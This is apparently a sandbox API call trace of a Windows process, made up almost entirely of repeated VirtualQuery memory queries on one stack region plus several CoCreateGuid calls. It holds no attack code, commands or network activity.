	[0299.496] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.496] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.497] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.497] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.497] VirtualQuery (in: lpAddress=0x12bab0, lpBuffer=0x12c970, dwLength=0x30 | out: lpBuffer=0x12c970*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.497] VirtualQuery (in: lpAddress=0x12b1a0, lpBuffer=0x12c060, dwLength=0x30 | out: lpBuffer=0x12c060*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b230, lpBuffer=0x12c0f0, dwLength=0x30 | out: lpBuffer=0x12c0f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.498] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.499] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.499] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.499] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.508] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.508] VirtualQuery (in: lpAddress=0x12b5e0, lpBuffer=0x12c4a0, dwLength=0x30 | out: lpBuffer=0x12c4a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.508] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.509] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.509] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.509] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.509] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xefcd8781, Data2=0x7b54, Data3=0x4b4c, Data4=([0]=0x8d, [1]=0x5f, [2]=0x28, [3]=0x6d, [4]=0x7a, [5]=0xe5, [6]=0xd9, [7]=0x68))) returned 0x0
	[0299.510] VirtualQuery (in: lpAddress=0x12b1a0, lpBuffer=0x12c060, dwLength=0x30 | out: lpBuffer=0x12c060*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.510] VirtualQuery (in: lpAddress=0x12b230, lpBuffer=0x12c0f0, dwLength=0x30 | out: lpBuffer=0x12c0f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.510] VirtualQuery (in: lpAddress=0x12b450, lpBuffer=0x12c310, dwLength=0x30 | out: lpBuffer=0x12c310*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.510] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x3b8fa58c, Data2=0x9ec7, Data3=0x40be, Data4=([0]=0xa0, [1]=0xe7, [2]=0xef, [3]=0x62, [4]=0x66, [5]=0x73, [6]=0xcf, [7]=0x4f))) returned 0x0
	[0299.510] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x87d69c90, Data2=0x54ee, Data3=0x4ce7, Data4=([0]=0x82, [1]=0x63, [2]=0xcf, [3]=0x57, [4]=0x7e, [5]=0x2d, [6]=0xf9, [7]=0x4f))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x75211897, Data2=0xfb30, Data3=0x4b05, Data4=([0]=0xbd, [1]=0x12, [2]=0x6f, [3]=0x23, [4]=0x14, [5]=0x5c, [6]=0x24, [7]=0x5e))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x59c3272e, Data2=0x5c67, Data3=0x4be5, Data4=([0]=0x92, [1]=0xe5, [2]=0xc9, [3]=0x60, [4]=0x72, [5]=0xa0, [6]=0x37, [7]=0x29))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x7dbedca5, Data2=0xdc50, Data3=0x46d2, Data4=([0]=0x8d, [1]=0xb8, [2]=0x84, [3]=0x38, [4]=0xcb, [5]=0x59, [6]=0x71, [7]=0x47))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xbccf699f, Data2=0x98f2, Data3=0x467c, Data4=([0]=0xa8, [1]=0xd8, [2]=0x41, [3]=0xd2, [4]=0xd2, [5]=0x40, [6]=0xf, [7]=0x14))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xce4a7160, Data2=0xc36e, Data3=0x4dec, Data4=([0]=0x91, [1]=0xd3, [2]=0xfe, [3]=0x25, [4]=0xd, [5]=0x37, [6]=0x0, [7]=0x4c))) returned 0x0
	[0299.511] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x8974b79, Data2=0x1910, Data3=0x4c84, Data4=([0]=0x92, [1]=0x5e, [2]=0x1f, [3]=0x62, [4]=0x68, [5]=0xed, [6]=0x8e, [7]=0x77))) returned 0x0
	[0299.511] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.512] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b010, lpBuffer=0x12bed0, dwLength=0x30 | out: lpBuffer=0x12bed0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b0a0, lpBuffer=0x12bf60, dwLength=0x30 | out: lpBuffer=0x12bf60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.513] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xa13b6a51, Data2=0x8a6b, Data3=0x40c6, Data4=([0]=0x86, [1]=0xe8, [2]=0xf, [3]=0xbb, [4]=0x6, [5]=0x5b, [6]=0x35, [7]=0x2a))) returned 0x0
	[0299.514] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.514] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.515] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b920, lpBuffer=0x12c7e0, dwLength=0x30 | out: lpBuffer=0x12c7e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b9b0, lpBuffer=0x12c870, dwLength=0x30 | out: lpBuffer=0x12c870*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.516] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x6dc5ef27, Data2=0xecce, Data3=0x427d, Data4=([0]=0x97, [1]=0x56, [2]=0xa4, [3]=0x3e, [4]=0x53, [5]=0xe6, [6]=0x73, [7]=0x46))) returned 0x0
	[0299.517] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.517] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
